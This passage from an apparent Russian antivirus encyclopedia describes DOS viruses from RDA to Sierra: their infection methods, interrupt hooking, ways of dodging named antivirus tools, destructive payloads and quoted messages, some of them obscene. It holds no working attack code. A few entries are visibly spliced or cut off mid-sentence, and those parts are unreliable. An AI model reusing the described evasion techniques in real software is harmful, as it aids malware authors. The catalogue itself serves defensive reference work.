MOV CS:DESTROY_HANDLER+2, AX ;и регистр AX (4C00 или 3E??)
CALL CHECK&RESTORE ;проверка и восстановление
CALL CHECK_FILE_NAME ;а здесь уже никакой команды IRET ;не будет!
....................
Вирусы не заражают следующие файлы *ES?.* (AIDSTEST.EXE), *WE?.* (WEB.EXE), *AN?.* (COMMAND.COM). RDA.Fighter.7408 при старте программы CHKDSK "выключает" свой механизм скрытия истинной длины зараженных файлов. После завершения ее работы - снова "включает". В процессе инфицирования вирусы устанавливают свой обработчик критических ошибок INT 24h, дисковый обработчик INT 13h, если в системе нет дискового кэша и устанавливают обработчики INT 01 (пошаговое выполнение команд), INT 03 (точка останова) и INT 2Ah (Microsoft network) на свои обработчики, содержащие единственную инструкцию - IRET. При заражении файла, вирусы случайным образом выбирают (таким же, как и при определении регистра AX при попытках расшифровки своего кода) смещение и размер области, которая будет зашифрована в инфицируемом файле. Данная шифровка предназначена, видимо, для невозможности восстановления файлов специальными антивирусными утилитами (ADinfExt, TbClean,..).

RedArc - вирусы

Вирусы, изготовленные тульским "умельцем" Игорем Дикшевым 2:5022/12.23, известным более под кличкой Red Arc.

RedArc.Fraud

Неопасный нерезидентный вирус. Заражает EXE-файлы, внедряя свой код в начало файлов (переводя их в COM-формат), а зашифрованные оригинальные начальные байты переносит в конец файлов. При старте такого файла, вирус производит поиск и заражение EXE-файлов. После чего, если было произведено хоть одно заражение, вирус восстанавливает файл-жертву в исходное состояние ("самоизлечивается") и выводит текст "Bad command or file name".

RedArc.Helga.666

Опасный нерезидентный вирус. Разрушает файлы *.°*, *.ms. Иногда выводит текст:
ТЫ ХОТЕЛ УВИДЕТЬ НЕБО? ГОЛУБОЕ-ГОЛУБОЕ?
ТЫ ХОТЕЛ УВИДЕТЬ НЕБО?
НЕВИДАТЬ ЕГО СО МНОЙ!
и "завешивает" систему. Содержит строку "Helga".

RedArc.Stinger

Неопасный нерезидентный шифрованный вирус. Иногда выводит на экран строку "STINGER".

RedArc.Vesna.1000 (1,2), 1614, 1724, 1751, 1833

Опасные нерезидентные вирусы. Удаляют файлы ch*.* и *.°°°. И под мигание лампочек клавиатуры и дисководов система "зависает". Vesna.1751 не заражает файлы из списка (по 2 буквы на имя файла): aicodrwetbmsmvavscadutanatsdncvcdnwiioibvi. Различные версии вируса содержат следующие тексты "My name is GARRY", "*TULA*", "Это зделано в ТулE", "TULA", "Пришла весна !", "Здесь был Игорь Д.", "ОЛЕЧКА", "TYPE HAPPY BIRTHDAY GARRY".

RedLaugh.607

Неопасный резидентный вирус. При старте любой программы, вирус окрашивает экран в красный цвет и выводит текст:
Красный смех гуляет по стране...
01/21/96 by FDD.

Remute.779

Неопасный резидентный вирус. Содержит тексты "A long time ago,in very remute institut ...", "LIGHT in the DARK".

Renegade.1176

Опасный резидентный вирус. Заражает EXE-файлы при их запуске или при их открытии. Заражает довольно необычным способом: считывает 1024 последних байт файла, записывает на их место 1176 байт своего кода, а затем - считанные 1024 байта. При этих манипуляциях вирус не корректирует таблицу перемещаемых символов (relocation table), в результате чего инфицированная программа может быть неработоспособной. 11 числа каждого месяца выводит текст:
© Renegade 1994. Hello Hacker`s !!!

Renegade.4509

Очень опасный резидентный шифрованный файлово - загрузочный вирус. Заражает COM, EXE-файлы и MBR всех жестких дисков, присутствующих в компьютере. После 55 загрузок с инфицированного MBR вирус устраивает видеоэффект "плавающих" цветных линий по экрану, шифрует жесткий диск и выводит на экран "бегущей строкой" текст:
Please wait ...
Hey , LAMER ! Are you all right ?.. Not so good ?..
Oh, don't be afraid my little baby ,angry wolf if far away !......
bUt I aM sTiLL HeRe ! AnD i Am HuNGRrry ! Aaarrrgghhh !...
YoU iS _fOxPro or pAsCAL_pROGraMmeR , iSn't It ?...
Oogghh , YeEsss ! I WaNt to EaT YoU NoWww !
NoW YoU WiLL bEcOme ViCTiM of HACKER's REVENGE !
Внедряется в середину COM и EXE-файлов, корректируя адреса перемещаемых элементов для EXE-файлов. Не заражает файлы, содержащие в своем имени буквосочетания WEB, AIDS, ADINF, HIEW, CHKDSK,SCAN,VSAFE,MSAV,CLEAN,-V. Содержит тексты "Say THANKS to lovely Dr.Web for damage this file...", "© Renegade 1995.".

Reset.607

Неопасный вирус. Если значение минут системного времени больше 54, то вирус выводит на экран текст "For Main Menu press RESET".

Revelation.4096

Неопасный резидентный полиморфный вирус. В октябрьские воскресенья выводит на экран текст:
These things saith he that hold TASM in his right hand and walketh amongst the FAT tables, boot sectors, and partition tables. He that hath a VDU, let him see what I typeth unto the users: I have a few things against thee, because thou sufferest that whore software security, and commit anti-virus protection. Behold, I will cast thou unto limbo, and them that repent their deeds shall be spared the low-level drive format. Remember therefore how thou hast recieved and heard, and hold fast, and repent. If therefore thou shalt not repent, I will come on thee as a thief, and thou shalt not know what hour I will come upon thee.

Reverse.948

Неопасный резидентный вирус. Содержит строку "moc.dnammocexe.niamcn". Не заражает файл NCMAIN.EXE. Командный процессор COMMAND.COM заражает, внедряясь в область нулей, и не увеличивает его длину. Содержит еще одну текстовую строку "Red Spider Virus created by Garfield from Zielona Gora in Feb 1993".

Rex.1637

Опасный резидентный файлово-загрузочный полиморфный вирус. При заражении MBR "винчестера" не сохраняет оригинальный сектор. После 99 загрузок с инфицированного диска вирус производит некоторые манипуляции с клавиатурой (INT 16h). Содержит текст "REX".

Riot.309

Очень опасный нерезидентный вирус. Может уничтожить 1234 секторов диска C:. Первым делом стремится заразить файл c:\dos\doskey.com. Содержит текст "© 1994 Metal MilitiaImmortal Riot, Sweden".

Riot.Demand

Опасный overwriting вирус. Создает файл C:\INFERNAL.IR, в который записывает следующий текст:
Infernal Demand! © Metal Militia / Immortal Riot
Your misery is our pleasure!
Your nightmare is our dream!
Your hell is our paradise!
Your lost is our demand!
Your cry is our laugh!
And your fate is ours!

Riot.Enemy.757

Содержит текст:
Unknown Enemy © Metal Militia/Immortal Riot
I'm hurt, machineguns firing behind my back
Never had no chance, no way to do a attack
Thisone sure is the last time i guess
Heading for a private deathrow, nothing less
Blood, quickly pumping out from the vound in the vain
Damn, this moment makes you sort of go insane
Close my eyes, had much left to see
Was my fault, but did they have to do it, gee?
Promise me, this hit you will remember
Take one of them down before winter comes in december
Why that month? Well, i like it very much
Fresh, cool air, wonders of the snow to touch
The world is wonderful, what else to say?
Just remember this shit, cause it happends every day

Riot.Evil.769

Неопасный резидентный вирус. Вперемешку с инструкциями ассемблера рас- положены следующие текстовые строки:
Our past is our future!
[INVISIBLE EVIL!] © Metal Militia/Immortal Riot
Dedicated to all the victims..
Greets to B-real!/IR
It's like this and like that and like thisena
It's like that and like this and like thatena
It's like this..
Love to Lisa!
All i ever wanted..
All i ever asked for..

Riot.Flood

Очень опасный резидентный вирус, перезаписывающий программный код. При старте таких программ вирус выводит фразу "Bad command or filename". 21 числа выводит текст "Hey Bud.. You picked the leave with the virus on it!". Имеет текст "Burn:CycleYou picked the leave with the virus on it!© Atomic Morphine/ FLooD 1999".

Riot.Marked.354

При старте выводит сообщение "Bad command or filename", а 21 числа:
In any country, prison is where society sends it's
failures, but in this country society itself is faily
Внутри вируса имеется также текст:
Marked-XWill we ever learn to talk with eachother?
© Metal Militia/Immortal Riot

Riot.Multiplex

Опасный нерезидентный вирус. 5 числа уничтожает 256 секторов диска C:. Содержит тексты "MULTiPLEX © 1994 Metal Militia\ Immortal Riot, Sweden*. Somewhere, somehow, always :)*.com", "JUNK", "ImRio".

Riot.Pollution

Опасный резидентный вирус. Иногда уничтожает содержимое CMOS-памяти. 6 июня проигрывает какую-то мелодию. Содержит строку "Digital Pollution © '94 Raver/Immortal Riot".

Riot.RatBoy.513, 545, 671

Очень опасные нерезидентные вирусы. По воскресеньям после 15 числа пытаются уничтожить содержимое всех логических устройств жесткого диска, записывая в сектора строки:
Riot.RatBoy.513 - "RaTBoY HaTeS YoU!!! Ihater-u-all\JUNK TEST".
Riot.RatBoy.545 - "RaTBoY WaS HeRe!!! My Vx, Invircible Killer".
Riot.RatBoy.671 - "RaTBoY Loves Mrs. RaTBoY!!! \JUNK TEST".
Riot.RatBoy.545, 671 уничтожают некоторые файлы, видимо, таблицы антивируса InVircible.

Rmb

Очень опасный загрузочный вирус. При заражении не сохраняет оригинальные загрузочные сектора. При нажатии на Ctrl-Break вирус может уничтожить по 14 секторов на всех головках "винчестера".Содержит строку "RMBDRMCCQBDWRM".

Rock.1076

Неопасный нерезидентный вирус. По четным числам с 10-го по 26-е, кроме декабря, субботы и воскресенья, оставляет в памяти резидентный код, который "трясет" экран по 20 секунд каждые 20 минут.

Rogue.1208

Опасный резидентный вирус. Уничтожает файлы с расширением DBF, записывая в них первый байт 'R' и производя с остальным содержимым файла операцию XOR 0Dh, до первого символа 0Dh. Уничтожает файлы CHKLIST ???. В месяц, когда сумма значения года и значения месяца равна 2000 вирус выводит текст:
Now you got a real virus! I'm the ROGUE ...!

Roman.1439, 1995

Неопасные резидентные шифрованные вирусы. При старте программы DRWEB вирусы обезвреживают свои резидентные копии (освобождают INT 21h), которые в дальнейшем (через INT 1Ch) опять восстанавливают свою работоспособность. При удалении файла ROMAN!.113 вирусы выводят на экран текст:
Roman.1439:
Экспериментальная школа
Roman.1995:
Внимание! В системе находится вирус Roman (1) Virus! Это абсолютно безвредный вирус, заражающий .COM файлы. Никаких причин для беспокойства нет. Он написан автором просто ради спортивного интереса. Если Вам нежелательно его присутсвие в системе (а он Вам ничем не помешает), просто уда- лите все .COM файлы, содержащие на 4 и 5 позиции от начала символосочетание "RB" - это признак инфицированности - и пере- запустите компьютер.
Roman (1) Virus написан осенью 1997 года.
© -= Pilz =-, 16 years old.
Экспериментальная школа, физико-математический лицей.909-436X
Нажмите на любую клавишу, чтобы продолжить работу.

RP (1,2)

Опасные загрузочные вирусы.RP (1) 17 декабря выводит текст "RP wants to say hello!" и уничтожает MBR. RP (2) в мае выводит текст "Only bugs exist!".

RPS (1-3)

Очень опасные загрузочные вирусы. Заражают MBR винчестера и сектора флоппи-дисков, не сохраняя оригинальные загрузчики. При 50-ой загрузке с инфицированного диска, или при попытке записи в инфицированный MBR, или при не нахождении активного загрузочного сектора, вирусы уничтожают информацию в секторах дисков. Содержат тексты "RPS", "RPS2", "RPS3".

RTP.Demo.4838

Неопасный нерезидентный полиморфный вирус. Содержит тексты:
RTP 0.1b Demo Virus © 1998, The Soul Manager
Greetings Mr Kaspersky, we've been expecting you ;)
If you can see this text, you are reading AVPVE!merely dueto a philanthropic trait of the author......

Russel.3072Б

Неопасный резидентный полиморфный вирус. Имеет текст "RUSSEL FARADAY". По возможности устанавливает свою резидентную копию в область UMB.

0

19

S

Sabotager.3133

Неопасный резидентный полиморфный вирус. При выводе на экран слова "Лoзинский" (видимо, при старте программы Aidstest) вирус выводит на экран картинку черепа (см. Phantom1.7000) и текст:
ПИШИТЕ ЖАЛОБЫ В ООH!
SABOTAGER
Версия 1.0
Written by
S H U L D E R
Hажми любую клавишу ...
ожидает нажатия на клавишу и заканчивает работу стартовавшей программы.

Salman.2000

Опасный нерезидентный вирус. Удаляет файлы chklist.ms,chklist.cps, c:\signture.dat. Не заражает файлы:те уничтожает 10 первых секторов жесткого диска и выводит сообщение "

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

Sandrine Baillieux thoughts of you are in my mind

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

©1994 by BrokenHeart

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

".

Sara.1214

Очень опасный нерезидентный вирус. При запуске инфицированной программы, вирус проигрывает мелодию, выводит порнографическую картинку (о воспроизведении которой здесь не может идти и речи),производит поиск *.EXE-файла в текущем каталоге и записывает в него и в файл C:\COMMAND.COM свой код поверх программного кода. Содержит в себе текстовые строки: "Darkest Avenger", "Isnt dedicated to Sara Gordon", "Its dedicated to her GROOVE!".

Saratov.1790

Опасный резидентный вирус. Уничтожает содержимое файла CHKLIST.MS. Иногда выводит сообщение "Thanks for using Saratov software.". Не заражает файлы, начинающиеся на EVR,WD.,800,COM,DRW,ANT,AID,WEB,WIN, KRN,SCA,CLE,PT., а также при обнаружении на экране слова Web. При запуске любой программы с командной строкой "/C Vir", вирус изменяет ее на "/C Ver" и выводит текст "The File Corrector v2.0. Made in Saratov. Serial #????".

Sarov.1000, 1140, 1200(1,2)

Резидентные шифрованные (Sarov.1200 - полиморфный) вирусы. Заражают COM -файлы при их поиске (f.11h, 12h, 4Eh, 4Fh Int 21h). Перехватывают INT 1, 8, 9, 21h. Контролируют трассировку своего кода, изменяют статус флоппи-дисков, пропускают символы, введенные с клавиатуры. Имеют тексты
Sarov.1000 - "BIL`92`S",
Sarov.1140 - "BIL_92_Sarov",
Sarov.1200 - "[BIL_92_Sarov]".

SatanBug (1-3)

Безобидные резидентные полиморфные вирусы. Используют довольно сложный алгоритм шифрования своего кода. Резидентная часть вируса также является полиморфной. При получении управления (INT 21h f.3Dh и f.4Bh) вирус сначала расшифровывает свое тело в памяти, а затем уже отдает ему управление. Содержит строки: "Satan Bug virus - Little Loc", "COMSPEC=COMMAND.COM".

SatanBug.1568

Полиморфный вирус. Перехватывает INT 21h, причем смещение обработчика прерывания может, в зависимости от времени старта, находиться в различных непостоянных адресах.

SatanBug.FruitFly

Опасный нерезидентный полиморфный вирус. Использует алгоритм шифровки, "заимствованный" из вируса SatanBug. Уничтожает файлы VS.VS и CHKLIST.CPS. Содержит строки: "Fruit Fly virus - Little Loc", "Hacker4Life", "Hackers In ThE Mist".

Satria (1-4)

Неопасные загрузочные вирусы. 4 июля или при заражении MBR выводят на экран картинку:
ЬЬЬЬ возникновении ошибок (переход за границу 64K при работе с DMA и данные скорректированы с использованием ECC), при попытке записи на диск, вирусы пытаются исправить данные ошибки! Содержат текст "SW Error", "SW DIE HARD 2".

Sayha.Watpu

Неопасный резидентный вирус. Основная часть кода вируса зашифрована, и вирус производит шифрацию своих участков во время работы. При инсталляции в память вирус трассирует INT 13h, INT 21h. Причем он может не просто перехватить INT 21h, а "вклиниться" в цепочку обработчиков INT 21h, подменяя адрес перехода в прямых или косвенных межсегментных инструкциях передачи управления (jmp far ptr ?:?, call far ptr ?:?, jmp dword ptr [?], call dword ptr [?]). В связи с этим вирус трудно обнаружить в памяти, если не проследить всю цепочку обработчиков INT 21h. 3 и 18 числа любого месяца, а также 15 сентября может вывести сообщение "SW Error".

Scoundrel.3323

Неопасный резидентный полиморфный вирус. Заражает файлы при их старте (f.4B00h INT 21h) и при их закрытии (3Eh). При открытии файлов (3Dh, 6Ch), информации об атрибутах (43h), переименовании (56h), поиске (11h, 12h, 4Eh, 4Fh) и загрузке в память без выполнения (4B03h) удаляет свой код из файлов, к которым происходят данные обращения. Предпринимает всяческие попытки, затрудняющие анализ вирусного кода. Иногда выводит на экран текст:
SoftPecker v.1 © 1992 by ScoundrelSoft - 'Your pleasure is our business'

Scroll.600 (1,2)

Неопасные вирусы. Scroll.600 (1) - нерезидентный, а Scroll.600 (2) - резидентный вирусы. Scroll.600 (1) иногда выводит на экран строку "[1][1] Scroll v1.0 [1][1]" и начинает "вращать" экран до нажатия пользователем на любую клавишу. Scroll.600 (2) "перехватывает" INT 9 и при нажатии на Ctrl-Alt-Del "проворачивает" снизу вверх экран, не перегружая систему.

Sds.1906

Очень опасный зашифрованный вирус. 10 января, 16 апреля, 4 июня и 1 сентября уничтожает содержимое CMOS-памяти.Иногда уничтожает содержимое секторов дисков. Содержит тексты "COMMAND.IBM", "<21

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

47>".

Seat.1614, 1868, 2389, 2419

Неопасные резидентные вирусы. Seat.2389, 2419 - полиморфные. Иногда рисуют на экране в текстовом режиме изображение голого зада с видео и звуковыми эффектами.

Sebo.2048

Неопасный резидентный вирус. Производит чтение загрузочных секторов дисков в дисководе A:. При нахождении слова 880h по смещению +8 (???) - пищит динамиком.

SeeYou

Очень опасный загрузочный стелс-вирус.При старте какой-то EXE-программы длиной 100K вирус удаляет свой код из загрузочного сектора жесткого диска. Если удвоенное значение числа равно значению месяца, то вирус уничтожает по 4 дорожки на 2 цилиндрах каждого логического раздела первого жесткого диска и выводит сообщение "See you later ...". 20 октября вирус выводит другое сообщение: "Happy birthday Populizer!".

Select.1112

Неопасный резидентный вирус. В воскресенье при нажатии на Ctrl-Alt-Del проигрывает мелодию и выводит текст "ъДНЁSELECTRONICSъSOFTWAREЁНДъ". Также содержит строку "© Selectronics Software".

Sentinel.4636, 5173

Неопасные резидентные вирусы. Написаны на языке Turbo Pascal. Содержат зашифрованный текст "You won't hear me, but you'll feel me... © 1990 by Sentinel. Thanks Borland.".

SerNo.1471

Очень опасный полиморфный вирус. Уничтожает содержимое 2000 секторов диска C:. Изменяет значение случайного байта в случайном секторе жесткого диска. Если инфицированная программа будет запущена с параметром '??', то вирус выведет на экран строку "V1.01 ser.No : 00001", где в качестве параметра (в приведенном примере - 00001) используется счетчик заражений.

SGWW - вирусы.

Вирусы созданные группой лиц, называющих себя SGWW (Stealth Group World Wide). Данный конгломерат начинал свою деятельность в Киеве на Украине.

SGWW.Ace

Опасный резидентный шифрованный вирус. Заражает COM-файлы и объектные файлы (OBJ) EXE-модулей. При старте программы, имя которой начинается на букву "W", вирус может вывести на экран текст:
This program wastes a lot of memory,
SYSTEM HALTED...
После чего программа уничтожается (обнуляется ее длина) и система "перезагружается" вирусом. Вирус содержит текст "© Ace of Spades , Kiev-1995... Don't be a snub - enjoy yourself!".

SGWW.Amber.1408

Неопасный нерезидентный полиморфный вирус. Содержит строки "[Trivial]", "[AMBER1.07@beta]". Предназначен для демонстрации полиморфного генератора Amber,созданного украинским вирусописателем Костей Волковым (Reminder).

SGWW.Amber.2724

Неопасный резидентный полиморфный вирус.Содержит тексты "[ъThis is only ForeWordъ]", "[AMBER1.07@beta]".

SGWW.Beast.1216

Неопасный резидентный шифрованный вирус. Содержит текст "© Beast. Advanced Disk Infector. [ADinf v1.5]".

SGWW.Beast.1347

Неопасный нерезидентный шифрованный вирус. При заражении использует упрощенные механизмы из вирусов семейства OneHalf. Содержит тексты:
© Copyright by Beast.
© Stealth Group Bishkek.
© Stealth Group World Wide.
Infection by Beast. v0.91
Stealth Group World Wide.
[Bomber v1.0] by Beast. Stealth Group World Wide.

SGWW.Killer.3072 (1-3), 3584 (1,2)

Очень опасные резидентные полиморфные вирусы. В первых числах месяца могут уничтожить содержимое первых двух жестких дисков. Не заражают файлы, начинающиеся на AIDS,CHKD, WEB, SCAN,AR, ZI, TB. Содержат тексты "EMME v3.0. KILLER.", или "Multilevel Encryptor v1.0. Generation:", "-=Killer=-", или "EMME v4.0. -= KILLER =-", или "-=Unlimited Grief=-", "Kiev'96".

SGWW.Light

Неопасный нерезидентный вирус. Содержит тексты:
This virus was made for Computer Virus Club `Stealth`
Our address : Kiev 148 - box 10
© Light General.Kiev.1995.For free use!
КИЕВСКИЙ МЕЖДУНАРОДНЫЙ УНИВЕРСИТЕТ ГРАЖДАНСКОЙ АВИАЦИИ

SGWW.Maverick.1536 (1,2)

Полиморфные опасные вирусы. Если значение месяца совпадает со значением дня или значение дня в 2 раза больше значения месяца, то вирусы пытаются уничтожить содержимое секторов 6 головок жесткого диска. Но в данной процедуре имеется ошибка, и уничтожение не произойдет. Автору вирусов можно посоветовать до конца отладить свои намерения на своем компьютере. Содержат текст: "© ETERNAL MAVERICK. Kiev Computer Virus Club 1994.".

SGWW.Maverick.2048

Опасный полиморфный вирус. Если значение дня равно значению месяца+1 или +2, то вирус устанавливает INT 13h (операции с диском) на INT 04 (INTO). Если значение дня равно значению месяца+2, то вирус выводит текст:
ЙНННННННННННННННННННННННННННННННН»
є ЪДДДДДДДДДДДДДДДДДДДДДДДДДДДДї є
є і LETS REST UNTIL TOMORROW ! і є
є АДДДДДДДДДДДДДДДДДДДДДДДДДДДДЩ є
є © ETERNAL MAVERICK 1995. є
ИННННННННННННННННННННННННННННННННј
Press RESET to continue...
Не заражает программы, начинающиеся на AIDS, WEB, CHKD, SCAN.

SGWW.Never.1000

Неопасный резидентный шифрованный вирус. При открытии (f.3Dh Int 21h) инфицированных COM-файлов, вирус удаляет свой код из них,а при закрытии (f.3Eh Int 21h) их снова заражает. Содержит тексты "дАнИлОфФ-дУб,wEb- ГоРбУхА", "[Never-Never] by Int O`Dream", "Киев,4:09am,31/03/96".

SGWW.Nostardamus.1870, 2078, 2184, 2247, 2308, 2500 (1,2), 2560, 5995

Очень опасные резидентные полиморфные стелс-вирусы. Могут уничтожить 80 секторов диска A:. SGWW.Nostardamus.2247 при обращении к скрытым или системным файлам с расширениями, две последние буквы которых отличны от OM, YS, XE, VL, записывает в их начало один случайный байт. Перехватывают INT 16h, 1Ch, 21h, читают на каждой дорожке по одному сектору, имитируя форматирование жесткого диска. При нажатии на клавишу во время данного процесса, вирусы продолжат свою дальнейшую инсталляцию в память. SGWW.Nostardamus.1870 уничтожает содержимое первого жесткого диска. Около 18:00 вирусы выводят на экран строку "HOME RUN !!!". В определенные моменты, при нажатии на F8, Shift-F8, Ctrl-F8 вирусы игнорируют данные комбинации клавиш, нажатие же Ctrl-F10 изменяют на нажатие F8. Для файлов, имеющих первые буквы в имени AI и CO или заканчивающихся на EB, NF, TI, вирусы при их старте обнуляют их окружение (environment), для невозможности проверки программного кода. SGWW.Nostardamus.2184, 2500, 2560, 5995 иногда игнорируют запрос на удаление файлов (f. 13h, 41h Int 21h). SGWW.Nostardamus.5995 иногда выводит одно из нижеперечисленных сообщений, после чего ожидает нажатия на клавишу Esc:
Осторожно - на борту бомба! Зачем звал ,Хозяин ?
В дисководе А: две дискеты !! В дисководе КРЫСЫ !!!
Храните деньги в банке !! Кто там ? Это я, Чикатило!
Лучше пива только ФАВТ !!! Да выключите свет наконец!
Извините, а как вас зовут ? Ваше место дома на диване !
Can you FUCK me ? May be ! СНИКЕРС - как у негра в ...
Пиво не роскошь, а средство ! Press CTRL-ALT-DEL ...
AIDSTEST не поможет ! TWIX - то, чего у вас нет!!!
Invalid user. Unknown error ! BOUNTY - нас любят все !!
Good user - Dead user !!! MILKYWAY утонул !
COMMAND.COM умер! Press key.. Запустите AIDSTEST !!!
Яна мы тебя любим !!! У Вас плохой мотор !
Insert new user and press ESC Читайте газету БИЗНЕС !
Пробоина в диске C:,прощайте! Морг рядом !!!
Дядя Вася дом покрасил ! Crazy & Co. ltd.
Прочитайте что такое вирус ! Поздравте меня с зачетом !!!
Вышел чукча на крыльцо . . . LISP - das is круто !
Лозинского на мыло !!! Insert new baks into drive A:
Данилов, мы тебя не уважаем. ... Пить ... Дайте воды ...
Пропал Снупи,ушел на болото.. Меняю жену 40 лет на 2 по 20!
I'm big RUSSIAN monstr !! Залипание клавиатуры!
System error, invalid TC.EXE. Утро вечера - мудренее !!!
See you later ... Я НЕ ПОБЕДИМЫЙ !!!
Белые братья хуже голубых... Не хочу !
Что смотришь, придурок !? CPU мертв.А FPU не заводится.
Лучше я чем другой, правда? ЛЕНИН ЖИВ !!!
Вентилятор is write protected СТАЛИН УМЕР, НО ДЕЛО ЖИВЕТ !!
Formatting disk C: y/y ? Надейтесь на лучшее !
&^%&^%&#^ - подумал Штирлиц ! Горбачев - сволочь !!!
Анекдот : Колобок повесился ! Ухожу в моностырь (женский)!
Мне нужно срочно позвонить ! Покрась и выбрось !!!
Не занимай левый ряд !!! Выпил пива - писай криво!
Осторожно ,злой USER ! ! ! Guns 'N' Roses это круто !
Конец работы ,ты свободен . Посмотри на часы !!!
У вас пена изо рта идет ! Сколько там времени ?
Всем молчать ! ! ! © Porno C++ 3.1
Я хочу КРОВИ !!! © Гиви Basic 7.0
Я хочу МЯСА !!! © Trubo Pascacal 7.0
Я хочу спать, отруби машину ! Играйте в DOOM III !
Я маньяк Чикатило !!! Все ! Конец света !!!
Матерь мира - М.Д. Христос !! Женщины, не пейте водки !
УРА ! НОВЫЙ ГОД !!! Где твоя босая ножка ?
КМУГА - полигон вирусов ! Тьфу... -> Плевательница !?;
Да обломайся ты ! ФАРЭО ЧЕМПИОН !!!
Не морочь голову !!! Virus detected, system halted
Как вам вирусок? Фигня, фигня Акции АО ~МММ~ упали !!!
Солнце встанет непременно !!! Keyboard error, press F1.
Это не сон, это SONY! TAMPAX - райское наслаждение.
Секретный диск X: установлен А ты записался в КМУГА ???
Вы должны мне 10000 рублей ! Выпьем Водки Ваня ...
SGWW.Nostardamus.5995 также содержит тексты:
Киевскому Международному Университету Гражданской Авиации, и лично Факультету Авиационного РадиоЭлектронного Оборудования посвящается: Вирус - ~Дискоглотатель~. Написан студентом ФАРЭО гр.203 © CopyLeft 1994 The NOSTARDAMUS.Maverick (CopyLeft) Version 3.2 ultra by Populizer
SGWW.Nostardamus.1870 имеет текст "NOSTARDAMUS © v1.1 beta".

SGWW.Penthouse

Неопасный нерезидентный шифрованный вирус. По средам воспроизводит некое подобие "тягучей" мелодии.

SGWW.Rattler

Опасный полиморфный стелс-вирус. Если значение дня равно значению месяца+1 то вирус пытается уничтожить содержимое первого жесткого диска. Не заражает программы, начинающиеся на AIDS, WEB, CHKD, SCAN. Содержит текст "This is RATTLER v2.0. Read the Infected Voice!".

SGWW.Simbioz

Неопасный нерезидентный вирус. Производит поиск *.COM-файлов в текущем каталоге, читает полностью найденный файл в память и производит поиск байт B4 ?? CD 21, что соответствует вызову прерывания DOS INT 21h. При нахождении данных байт вирус записывает вместо них инструкцию перехода на собственный код (E8 ?? ??), который записывает в конец файла. Т.о., вирус может получить управление при старте инфицированной программы, а может никогда не получить (если вирус внедрился в подпрограмму, которая при заданных условиях никогда не исполняется). В теле вируса имеется текст "[Simbioz.Inside]".

Sh.983, Sh.988

Неопасные зашифрованные вирусы. Размещают свою TSR-копию в двух различных сегментах памяти. Первая часть длиной 539 или 541 байт для Sh.988 размещается в сегменте 001E:0000h, вторая часть длиной 444 или 447 байт для Sh.988 - в сегменте 0054:0000h. Не заражают файлы, начинающиеся на AI, WP, HI, DO, KR. Содержат тексты:
Sh.983 - "(С) Shel,NSTU,1994,v3.1", "*.exe *.com", "Sh";
Sh.988 - "Novosibirsk,NSTU,1994,(С) Shel,v3.1", "*.exe *.com", "Sh".

Sh.1333

Опасный резидентный "слабополиморфный" вирус. Содержит 3 варианта расшифровщиков. Уничтожает файлы chklist.ms и c:\????f?c?.* (таблицы ADinf и ADinfExt), создавая их заново. Содержит тексты:
© Shel,NSTU,1994,v4.0
Sh
*.exe c:\ c:\dos chklist.ms c:\????f?c?.*

Shiny.918, Shiny.921, Shiny.<934

Неопасные резидентные вирусы, кроме Shiny.918, который очень опасен. Трассируют INT 21h. Перехватывают INT 1, 3, 9, 21h. Внедряют один байт CCh (INT 3) в оригинальный обработчик INT 21h. Shiny.921, Shiny.934 изменяют символы, вводимые с клавиатуры. Например, изменяют следующие последовательности символов:
:-) на :-(
:=) на :=(
;-) на ;-(
|-) на |-(
:) на :(
Shiny.921 и Shiny.934 содержат текст:
Shiny Happy Virus by Hellraiser and Dark Angel of Phalcon/Skism
Shiny.918 может уничтожить содержимое CMOS-памяти, а также 1 числа любого месяца уничтожает 10 секторов корневого директория текущего диска и выводит сообщение:
The root directory of the current drive has
been destroyed by the 7% Solution 3.0 virus!

Shirley.4096

Неопасный резидентный вирус. Содержит текст:
Marty McFly lives somewhere in time (Doc Brown)kFuck for Eddie!!
There is only one place to spend nice holidays... CASAL BORSETTI
in Italy... Fuck for John McAfee
and all the other Vrs-Killers...We have a right to live !!!!!!!!
Greetings to the 1704... you were the first Virus, that infected my System!
Greetings to Jerusalem-B...You were the Second! But now its my turn.
Hope You have fun with the Shirley-Virus !!!!!!
----------------
Dies ist die Geschichte einer Dreiecksbeziehung,kФnnte mann sagen-A.C,L.C.
und,natБrlich,CHRISTINE. Aber sie sollten wissen,dass Christine zuerst kam.
Sie war Arnies erste Liebe, und obwohl ich nicht meine Hand dafБr ins Feuer
legen moechte(denn mit 22 kann der Mensch sich ja noch irren),mФchte ich
doch sagen,dass Christine seine einzige wahre Liebe gewesen ist.
Deshalb ist diese Liebesgeschichte fБr mich eine TragФdie

Shish.1002, 1142

Очень опасные резидентные вирусы. С вероятностью 1/2 сохраняют в своем теле значение не оригинального, а измененного поля IP (+14h) заголовка (прибавляет к IP 10h) инфицированного EXE-файла. При старте такого EXE-файла вирусы,также с вероятностью 1/2 могут вычесть 10h из значения IP при отдаче управления программе-дрозофиле или оставить эту величину неизменной (правильной или неправильной). В результате, все инфицированные файлы могут "вешать" систему при старте. Возможно некорректное лечение таких файлов. Shish.1142 при нажатии на Ctrl-Alt- Del выводит текст:
WARNING!
SYSTEM REPORT:
If your system does not work properly,
change the month of the current system date.
Error code #
Вирусы содержат тексты:
Shish.1002: "[SHISH. Version 1.00][How long have you been encrypting the "Mutation Engine" in your source code?]"
Shish.1142: "[SHISH. Version 2.00]".

ShuHard.386

Неопасный резидентный вирус. При старте какой-либо программы, имеющей в командной строке параметр "doom",вирус на время работы данной программы с помощью регистра управления CR0 запрещает использование внутренней кэш-памяти процессора. Содержит текст "DOOM MD! R.ShuHard 1997".

Sibylle.853, 858

Опасные резидентные вирусы. Могут установить атрибуты файла в VOLUME LABEL (метка тома),а также могут записать в файл C:\AUTOEXEC.BAT текст:
:b
echo Looking for Sibylle...
goto b

Sierra (1-4)

Sierra (1) - неопасный, а Sierra (2-4) - опасные загрузочные стелс- вирусы. Sierra (1) после заражения диска выводит на экран текст "El Monвculo del Conde Sierra". Sierra (2-4) в 00:33 и 08:33 уничтожают сектора дисков.

Silly-вирусы

